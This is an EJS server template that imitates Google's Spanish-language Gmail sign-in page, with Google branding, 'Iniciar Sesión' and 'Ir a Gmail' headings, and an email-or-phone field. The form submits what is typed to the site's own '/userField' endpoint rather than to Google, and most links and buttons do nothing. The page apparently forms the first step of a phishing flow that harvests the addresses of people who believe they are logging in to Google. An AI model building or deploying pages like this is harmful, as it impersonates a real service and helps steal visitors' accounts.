<%-include('includes/head.ejs')%>

<link rel="shortcut icon" href="/img/logo.jpg">
<body>
    <div class="container-fluid">
        <div class="row" style="padding-top: 2cm;">
            <div class="col-lg-4 col-md-2 col-sm-0"></div>
            <div class="col-lg-4 col-md-8 col-sm-12">
                <form action="/userField" method="post">
                <div class="card" style="width: 100%;">
                    <div class="card-body text-center">
                        <img class="mt-4" src="/img/googlename.png" style="width: 75px; height: 24px;">
                      <h4 class="card-title mt-3">Iniciar Sesión</h4>
                      <h6 class="card-subtitle mt-3">Ir a Gmail</h6>
                      <div class="container" style="padding-left: 0.5cm; padding-right: 0.5cm;">
                        <div class="form-floating mb-3 mt-4">
                        <input type="email" class="form-control" id="floatingInput" placeholder="Correo electrónico o teléfono" name="username" required>
                        <label for="floatingInput" class="text-muted">Correo electrónico o teléfono</label>
                        <%-include('includes/alerts.ejs')%>
                        <p href="#" class="text-right pt-1" style="padding-right: 3cm; color: #1a73e8;">¿Has olvidado tu correo electrónico?</p>
                        </div>
                      </div>                                                                  
                    </div>
                    <div class="card-body">
                        <div class="container" style="padding-left: 0.5cm; padding-right: 0.5cm;">
                            <p class="text-muted" style="font-size: 14px;">¿No es tu ordenador? Usa el modo Invitado para iniciar sesión de forma privada.<a href="#" style="text-decoration: none;"> Más información</a></p>
                            <div class="row py-5">
                                <div class="col-4">
                                    <button type="button" class="btn btn-light" style="color: #1a73e8;"><small>Crear cuenta</small></button>
                                </div>
                                <div class="col-4"></div>
                                <div class="col-4" style="padding-left: 1cm;">
                                    <button type="submit" class="btn btn-primary"><small>Siguiente</small></button>
                                </div>
                            </div>
                        </div>                        
                    </div>
                  </div>
                  </form>
                  <div class="container-fluid">
                    <div class="row pt-3">
                        <div class="col-2">
                            <div class="input-group mb-3" style="font-size: 14px;">                                
                                <button class="btn btn-outline-secondary dropdown-toggle border border-0" type="button" data-bs-toggle="dropdown" aria-expanded="false"><small>Español (México)</small></button>
                                <ul class="dropdown-menu dropdown-menu-end">
                                  <li><a class="dropdown-item" href="#">Action</a></li>
                                  <li><a class="dropdown-item" href="#">Another action</a></li>
                                  <li><a class="dropdown-item" href="#">Something else here</a></li>
                                  <li><hr class="dropdown-divider"></li>
                                  <li><a class="dropdown-item" href="#">Separated link</a></li>
                                </ul>
                              </div>
                        </div>
                        <div class="col-2"></div>
                        <div class="col-2">
                            <button type="button" class="btn btn-light border border-0" style="color: #5f6368;"><small>Ayuda</small></button>
                        </div>
                        <div class="col-2">
                            <button type="button" class="btn btn-light border border-0" style="color: #5f6368;"><small>Privacidad</small></button>
                        </div>
                        <div class="col-2">
                            
                        </div>
                        <div class="col-2">
                            <button type="button" class="btn btn-light border border-0" style="color: #5f6368;"><small>Términos</small></button>
                        </div>
                    </div>
                  </div>                    
            </div>
            <div class="col-lg-4 col-md-2 col-sm-0"></div>
        </div>
    </div>
</body>
<%-include('includes/scripts.ejs')%> 